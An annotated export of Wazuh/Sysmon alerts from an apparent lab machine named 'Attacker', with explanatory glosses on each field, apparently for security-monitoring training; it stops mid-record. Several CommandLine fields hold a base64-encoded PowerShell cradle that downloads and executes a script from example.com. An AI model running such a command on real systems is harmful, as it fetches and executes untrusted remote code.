rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 114 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535330.2675904 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:27.5487001Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350117 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:27.053
ProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00}
ProcessId: 15812
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00}
ParentProcessId: 14568
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:27.053 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c15f-680a-cf0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15812 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14568 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 118 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535330.2683975 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:27.7747838Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350118 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:27.733
ProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00}
ProcessId: 15812
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bpcztlkl.1e1.ps1
CreationUtcTime: 2025-04-24 22:55:27.733
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:27.733 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c15f-680a-cf0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15812 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bpcztlkl.1e1.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:27.733 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 115 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535333.2686744 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:30.8278138Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350142 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:29.220
ProcessGuid: {94294ddc-c161-680a-d10c-000000000e00}
ProcessId: 5124
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00}
ParentProcessId: 15812
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:29.220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c161-680a-d10c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5124 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c15f-680a-cf0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15812 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 119 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535333.2694811 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:31.1496733Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350143 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:31.110
ProcessGuid: {94294ddc-c161-680a-d10c-000000000e00}
ProcessId: 5124
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ssbpiznj.l5y.ps1
CreationUtcTime: 2025-04-24 22:55:31.110
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:31.110 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c161-680a-d10c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5124 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ssbpiznj.l5y.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:31.110 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 116 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535343.2697576 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:38.7316316Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350329 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:33.660
ProcessGuid: {94294ddc-c165-680a-d60c-000000000e00}
ProcessId: 7424
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c161-680a-d10c-000000000e00}
ParentProcessId: 5124
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
